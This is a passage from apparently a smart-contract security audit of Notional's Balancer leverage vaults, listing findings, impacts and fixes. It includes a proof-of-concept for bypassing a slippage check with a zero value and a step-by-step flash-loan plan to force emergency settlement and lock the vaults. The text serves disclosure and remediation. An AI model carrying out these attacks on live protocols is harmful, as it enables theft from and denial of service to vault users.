Consider the following cases:\\nIf `callbackData.oracleSlippagePercent` = 9% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nIf `callbackData.oracleSlippagePercent` = 11% and `slippageLimitPercent` = 10%, the condition will evaluate as `True` and transaction will revert because it exceeds the designated threshold.\\nIf `callbackData.oracleSlippagePercent` = 0% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nThe problem is that when `callbackData.oracleSlippagePercent` is `0%`, this effectively means that there is no slippage limit. This essentially exceeded the designated threshold (10%), and the transaction should revert instead, but it did not.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nWithin `executeTradeWithDynamicSlippage` function, it will calculate the `trade.limit` by calling the `PROXY.getLimitAmount`. 
The `trade.limit` is the maximum amount of sellToken that can be sold OR the minimum amount of buyToken the contract is expected to receive from the DEX depending on whether you are performing a sell or buy.\\n```\\nFile: TradingModule.sol\\n function executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n ) external override returns (uint256 amountSold, uint256 amountBought) {\\n // This method calls back into the implementation via the proxy so that it has proper\\n // access to storage.\\n trade.limit = PROXY.getLimitAmount(\\n trade.tradeType,\\n trade.sellToken,\\n trade.buyToken,\\n trade.amount,\\n dynamicSlippageLimit\\n );\\n```\\n\\nWithin the `TradingUtils._getLimitAmount` function, when the `slippageLimit` is set to `0`,\\nIf it is a sell trade, the `limitAmount` will be set to `type(uint256).max`. See Line 187\\nIf it is a buy trade, the `limitAmount` will be set to `0`. See Line 207\\nThese effectively remove the slippage limit. Therefore, a malicious user can specify the `callbackData.oracleSlippagePercent` to be `0%` to bypass the slippage validation check.\\n```\\nFile: TradingUtils.sol\\n function _getLimitAmount(\\n TradeType tradeType,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n uint32 slippageLimit,\\n uint256 oraclePrice,\\n uint256 oracleDecimals\\n ) internal view returns (uint256 limitAmount) {\\n uint256 sellTokenDecimals = 10 **\\n (\\n sellToken == Deployments.ETH_ADDRESS\\n ? 18\\n : IERC20(sellToken).decimals()\\n );\\n uint256 buyTokenDecimals = 10 **\\n (\\n buyToken == Deployments.ETH_ADDRESS\\n ? 
18\\n : IERC20(buyToken).decimals()\\n );\\n\\n if (tradeType == TradeType.EXACT_OUT_SINGLE || tradeType == TradeType.EXACT_OUT_BATCH) {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return type(uint256).max;\\n }\\n // For exact out trades, we need to invert the oracle price (1 / oraclePrice)\\n // We increase the precision before we divide because oraclePrice is in\\n // oracle decimals\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n // For exact out trades, limitAmount is the max amount of sellToken the DEX can\\n // pull from the contract\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n\\n // limitAmount is in buyToken precision after the previous calculation,\\n // convert it to sellToken precision\\n limitAmount = (limitAmount * sellTokenDecimals) / buyTokenDecimals;\\n } else {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return 0;\\n }\\n // For exact in trades, limitAmount is the min amount of buyToken the contract\\n // expects from the DEX\\n limitAmount =\\n ((oraclePrice -\\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) /\\n oracleDecimals;\\n\\n // limitAmount is in sellToken precision after the previous calculation,\\n // convert it to buyToken precision\\n limitAmount = (limitAmount * buyTokenDecimals) / sellTokenDecimals;\\n }\\n }\\n```\\n\\nProof-of-Concept\\nThe following test case shows that when the slippage is set to 11% (11e6), the transaction will be reverted and fails the test. 
This is working as intended because the slippage (11%) exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[\"USDC\"].approve(env.notional, 2 ** 256 - 1, {\"from\": env.whales[\"USDC\"]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[\"USDC\"])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[\"baseStrategy\"][\"vaultSettings\"].dict())\\n settings[\"maxBalancerPoolShare\"] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {\"from\": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[\"UNISWAP_V3\"], TRADE_TYPE[\"EXACT_IN_SINGLE\"], 11e6, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {\"from\": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert vaultState[\"totalStrategyTokens\"] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py F 
[100%]\\n\\n==================================================================================================== FAILURES =====================================================================================================\\n```\\n\\nThe following test case shows that when the slippage is set to 0, the transaction does not revert and passes the test. This is not working as intended because having no slippage (0) technically exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[\"USDC\"].approve(env.notional, 2 ** 256 - 1, {\"from\": env.whales[\"USDC\"]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[\"USDC\"])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[\"baseStrategy\"][\"vaultSettings\"].dict())\\n settings[\"maxBalancerPoolShare\"] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {\"from\": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[\"UNISWAP_V3\"], TRADE_TYPE[\"EXACT_IN_SINGLE\"], 0, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {\"from\": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert vaultState[\"totalStrategyTokens\"] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts 
===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py . [100%]\\n\\n========================================================================================== 1 passed, 1 warning in 4.31s ===========================================================================================\\n```\\nчUpdate the `SettlementUtils._decodeParamsAndValidate` function to revert if the slippage is set to zero.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n// Remove the line below\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n// Add the line below\\n if (callbackData.oracleSlippagePercent == 0 || callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nAppendix I - Normal and Post Maturity Vault Settlement\\nThe `settlementSlippageLimitPercent` and `postMaturitySettlementSlippageLimitPercent` of the vault are set to 5% and 10% respectively per the environment file 
provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n \"settlementSlippageLimitPercent\": 5e6, # 5%\\n \"postMaturitySettlementSlippageLimitPercent\": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultNormal` or `settleVaultPostMaturity` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraVault.sol\\n function settleVaultNormal(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external {\\n if (maturity <= block.timestamp) {\\n revert Errors.PostMaturitySettlement();\\n }\\n if (block.timestamp < maturity - SETTLEMENT_PERIOD_IN_SECONDS) {\\n revert Errors.NotInSettlementWindow();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastSettlementTimestamp,\\n context.baseStrategy.vaultSettings.settlementCoolDownInMinutes\\n );\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.settlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastSettlementTimestamp = uint32(block.timestamp);\\n context.baseStrategy.vaultState.setStrategyVaultState();\\n }\\n\\n function settleVaultPostMaturity(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external onlyNotionalOwner {\\n if (block.timestamp < maturity) {\\n revert Errors.HasNotMatured();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp,\\n context.baseStrategy.vaultSettings.postMaturitySettlementCoolDownInMinutes\\n 
);\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.postMaturitySettlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp = uint32(block.timestamp); \\n context.baseStrategy.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nSince the same vulnerable `SettlementUtils._decodeParamsAndValidate` function is being used here, the `settleVaultNormal` and `settleVaultPostMaturity` functions are affected by this issue too.чMalicious users can trigger the permissionless `settleVaultEmergency` function and cause the trade to suffer huge slippage. This results in loss of assets for the vaults and their users.ч```\\nFile: BalancerEnvironment.py\\n \"postMaturitySettlementSlippageLimitPercent\": 10e6, # 10%\\n \"emergencySettlementSlippageLimitPercent\": 10e6, # 10%\\n```\\n -Rely On Balancer Oracle Which Is Not Updated FrequentlyчmediumчThe vault relies on Balancer Oracle which is not updated frequently.\\nNote: This issue affects the MetaStable2 balancer leverage vault\\nThe issue is that this pool only handled ~1.5 transactions per day based on the last 5 days' data. In terms of average, the price will only be updated once every 16 hours. There are also many days that there is only 1 transaction. The following shows the number of transactions for each day within the audit period.\\n5 Oct 2022 - 3 transactions\\n4 Oct 2022 - 1 transaction\\n3 Oct 2022 - 1 transaction\\n2 Oct 2022 - 2 transactions\\n1 Oct 2022 - 1 transaction\\nNote that the price will only be updated whenever a transaction (e.g. swap) within the Balancer pool is triggered. Due to the lack of updates, the price provided by Balancer Oracle will not reflect the true value of the assets. 
Considering the stETH/ETH Balancer pool, the price of the stETH or ETH provided will not reflect the true value in the market.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n 
(BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n\\n```\\nFile: BalancerUtils.sol\\n function _getTimeWeightedOraclePrice(\\n address pool,\\n IPriceOracle.Variable variable,\\n uint256 secs\\n ) internal view returns (uint256) {\\n IPriceOracle.OracleAverageQuery[]\\n memory queries = new IPriceOracle.OracleAverageQuery[](1);\\n\\n queries[0].variable = variable;\\n queries[0].secs = secs;\\n queries[0].ago = 0; // now\\n\\n // Gets the balancer time weighted average price denominated in the first token\\n return IPriceOracle(pool).getTimeWeightedAverage(queries)[0];\\n }\\n```\\nчAlthough it is not possible to obtain a price pair that truly reflects the true value of an asset in the real world, the vault should attempt to minimize inaccuracy and slippage as much as possible. This can be done by choosing and using a more accurate Oracle that is updated more frequently instead of using the Balancer Oracle that is infrequently updated.\\nChainlink should be used as the primary Oracle for price pair. If a secondary Oracle is needed for a price pair, consider using Teller Oracle instead of Balancer Oracle. Some example of how Chainlink and Tellor works together in a live protocol can be found here\\nObtaining the time-weight average price of BTP LP token from Balancer Oracle is fine as the Balancer pool is the source of truth. However, getting the price of ETH or stETH from Balancer Oracle would not be a good option.\\nOn a side note, it was observed that the weightage of the price pair is Balancer Oracle - 60% and Chainlink - 40%. Thus, this theoretically will reduce the impact of inaccurate prices provided by Balancer Oracle by around half. 
However, the team should still consider using a better Oracle as almost all the functions within the vault depends on the accurate price of underlying assets to operate.\\nNote: For the stETH/ETH balancer leverage vault, the price pair is computed based on a weighted average of Balancer Oracle and Chainlink. Based on the test script, the weightage is Balancer Oracle - 60% and Chainlink - 40%.\\n```\\nFile: BalancerEnvironment.py\\n \"maxRewardTradeSlippageLimitPercent\": 5e6,\\n \"balancerOracleWeight\": 0.6e4, # 60%\\n \"settlementCoolDownInMinutes\": 60 * 6, # 6 hour settlement cooldown\\n```\\nчThe price provided by the function will not reflect the true value of the assets. It might be overvalued or undervalued. The affected function is being used in almost all functions within the vault. For instance, this function is part of the critical `_convertStrategyToUnderlying` function that computes the value of the strategy token in terms of its underlying assets. As a result, it might cause the following:\\nVault Settlement - Vault settlement requires computing the underlying value of the strategy tokens. 
It involves dealing with a large number of assets, and thus even a slight slippage in the price will be significantly amplified.\\nDeleverage/Liquidation of Account - If the price provided does not reflect the true value, users whose debt ratio is close to the liquidation threshold might be pre-maturely deleveraged/liquidated since their total asset value might be undervalued.\\nBorrowing - If the price provided does not reflect the true value, it might be possible that the assets of some users might be overvalued, and thus they are able to over-borrow from the vault.ч```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n (int256 
rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n (BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n -Attackers Can DOS Balancer Vaults By Bypassing The BPT ThresholdчmediumчMalicious users can lock up all the leverage vaults offered by Notional causing denial-of-service by bypassing the BPT threshold and subsequently triggering an emergency settlement against the vaults.\\nThe current BPT threshold is set to 20% of the total BPT supply based on the environment file provided during the audit.\\n```\\nFile: BalancerEnvironment.py\\n \"oracleWindowInSeconds\": 3600,\\n \"maxBalancerPoolShare\": 2e3, # 20%\\n \"settlementSlippageLimitPercent\": 5e6, # 5%\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply) \\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\n\\nWhen the total number of BPT owned by the vault exceeds the BPT threshold, no one will be able to enter the vault as per the require check at Line 295-296 within the `TwoTokenPoolUtils._joinPoolAndStake` function.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _joinPoolAndStake(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 primaryAmount,\\n uint256 
secondaryAmount,\\n uint256 minBPT\\n ) internal returns (uint256 bptMinted) {\\n // prettier-ignore\\n PoolParams memory poolParams = poolContext._getPoolParams( \\n primaryAmount, \\n secondaryAmount,\\n true // isJoin\\n );\\n\\n bptMinted = BalancerUtils._joinPoolExactTokensIn({\\n context: poolContext.basePool,\\n params: poolParams,\\n minBPT: minBPT\\n });\\n\\n // Check BPT threshold to make sure our share of the pool is\\n // below maxBalancerPoolShare\\n uint256 bptThreshold = strategyContext.vaultSettings._bptThreshold(\\n poolContext.basePool.pool.totalSupply()\\n );\\n uint256 bptHeldAfterJoin = strategyContext.totalBPTHeld + bptMinted;\\n if (bptHeldAfterJoin > bptThreshold)\\n revert Errors.BalancerPoolShareTooHigh(bptHeldAfterJoin, bptThreshold);\\n\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n }\\n```\\n\\nAnother key point that is critical for this issue is that when the total number of BPT owned by the vault exceeds the BPT threshold, an emergency settlement can be triggered against the vault and anyone can trigger it as it is permissionless. A major side-effect of an emergency settlement is that the vault will be locked up after the emergency settlement. No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens. The reason is that after the emergency settlement, there will be some asset cash balance in the vault and this will cause no one to be able to enter the vault due to the require check at Line 218. 
This side-effect has been verified by reviewing the codebase and clarifying with the sponsors.\\n```\\nFile: VaultState.sol\\n function enterMaturity(\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n VaultConfig memory vaultConfig,\\n uint256 strategyTokenDeposit,\\n uint256 additionalUnderlyingExternal,\\n bytes calldata vaultData\\n ) internal returns (uint256 strategyTokensAdded) {\\n // If the vault state is holding asset cash this would mean that there is some sort of emergency de-risking\\n // event or the vault is in the process of settling debts. In both cases, we do not allow accounts to enter\\n // the vault.\\n require(vaultState.totalAssetCash == 0);\\n```\\n\\nIf an attacker could force an emergency settlement on a vault anytime, he would be able to perform a DOS on the vault since the vault will basically be locked up after it. The following demonstrates how this can be performed:\\nAssume that the total supply of BPT in the WETH/stETH Balancer Pool is 100,000. Therefore, the BPT threshold of the vault will be 20,000.\\nAssume that the total number of BPT held by the vault is 19,900.\\nNote that under normal circumstances, it is not possible for the users to exceed the BPT threshold because the transaction will revert if the `bptHeldAfterJoin > bptThreshold` after the user enters the vault.\\nNote that at this point, the emergency settlement CANNOT be triggered against the vault because the vault has not exceeded BPT threshold yet\\nBob (attacker) flash-loans a large amount of ETH from dydx where the fee is almost non-existent (1 Wei Only)\\nBob allocates a portion of his ETH to join the WETH/stETH Balancer Pool. This will cause the total supply of BPT to increase significantly to 200,000.\\nBob allocates a portion of his ETH to enter the vault and causes the total number of BPT held by the vault to increase by 150 from 19,900 to 20,050. 
This is allowed because the total supply of BPT has increased to 200,000, and thus the BPT threshold has increased to 40,000. Also, Bob does not leverage himself and does not borrow from Notional since the flash loan already provided him with access to a large number of funds, and thus he does not need to pay for any borrowing cost to minimize the cost of this attack.\\nAt this point, due to the inflow of 150 BPT to the Balancer Pool, the total supply of BPT increase from 200,000 to 200,150.\\nAfter entering the vault, Bob exits the WETH/stETH Balancer Pool entirely with all his 100,000 BPT position. This will cause the total supply of BPT to fall back to 100,150. Per my research, there is no exit fee when a Liquidity Provider exits a pool. Also, a Liquidity Provider only suffers a loss due to impermanent loss. However, since all these steps are executed within the same transaction, there is no impermanent loss because no one perform any token swap. Thus, there is no cost incurred by Bob for this step.\\nNote that at this point, the emergency settlement CAN be triggered against the vault because the vault has exceeded the BPT threshold. The total number of BPT held by the vault is 20,050, and the BPT threshold is 20,030 (=100,150 * 0.2).\\nAnyone can trigger the emergency settlement as it is permissionless. Bob triggered an emergency settlement against the vault, and 20 BPT will be sold off in the market so that the vault will not exceed the BPT threshold. It is important to ensure that the number of BPTs to be sold is kept as low as possible so that the total value of the vault will not be reduced by slippage during the trade. This is because Bob still owns the shares of the vault and he wants to get back as much of his original deposit as possible later. This value can be optimized further with Math.\\nAs mentioned earlier, after an emergency settlement, the vault will be locked up. 
No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens.\\nBob proceeds to redeem all his shares from the vault. He will get back all of his deposits minus the 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders which is insignificant. Note that the Notional's leverage vault does not impose any exit fee.\\nBob proceeds to repay back his loan and pay 1 wei as the fee to dydx.\\nThe cost of attack is 1 wei (flash-loan fee) + 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders, which is insignificant. The slippage loss during emergency settlement can be minimized by causing the total number of BPT held by the vault to exceed the BPT threshold by the smallest possible value.\\nAll the above steps will be executed within a single block/transaction.чShort term, consider the following measures to mitigate the issue:\\nThe emergency settlement function is permissionless and can be called by anyone. It is recommended to implement access control to ensure that this function can only be triggered by Notional.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. 
If the user entered the vault in this block, he/she could only exit at the next block.\\nLong term, update the implementation of the vault so that the vault will not be locked up after an emergency settlement. After selling off the excess BPT, the vault should allow users to enter the vault as per normal.чMalicious users can lock up all the leverage vaults offered by Notional causing denial-of-service. This results in a loss of funds for the protocol as the vault is no longer generating profit for the protocol, and also a loss of funds for vault users as they cannot realize the profits because they are forced to exit the vault prematurely.\\nThe following are various reasons why someone would want to perform a DOS on Notional vaults:\\nDamage the reputation of Notional, and reduce users' trust in Notional\\nA competitor who is also offering a leverage vault attempts to bring down Notional\\nSomeone who shorted Notional's protocol tokenч```\\nFile: BalancerEnvironment.py\\n \"oracleWindowInSeconds\": 3600,\\n \"maxBalancerPoolShare\": 2e3, # 20%\\n \"settlementSlippageLimitPercent\": 5e6, # 5%\\n```\\n -Corruptible Upgradability PatternчmediumчStorage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during an upgrade.\\nFollowing are the inheritance of the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nNote: The contracts highlighted in Orange mean that there are no gap slots defined. 
The contracts highlighted in Green mean that gap slots have been defined\\nInheritance of the MetaStable2TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nInheritance of the Boosted3TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n Boosted3TokenAuraVault-->Boosted3TokenPoolMixin:::nogap\\n Boosted3TokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nThe Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults are meant to be upgradeable. 
However, it inherits contracts that are not upgrade-safe.\\nThe gap storage has been implemented on the `BaseStrategyVault` and `BalancerStrategyBase` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n}\\n```\\n\\n```\\nabstract contract BalancerStrategyBase is BaseStrategyVault, UUPSUpgradeable {\\n /** Immutables */\\n uint32 internal immutable SETTLEMENT_PERIOD_IN_SECONDS;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[100] private __gap;\\n}\\n```\\n\\nHowever, no gap storage is implemented on the `Boosted3TokenPoolMixin`, `MetaStable2TokenVaultMixin`, `TwoTokenPoolMixin`, `PoolMixin`, `AuraStakingMixin` and `BalancerOracleMixin` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nThus, adding new storage variables to any of these inherited contracts can potentially overwrite the beginning of the storage layout of the child contract, 
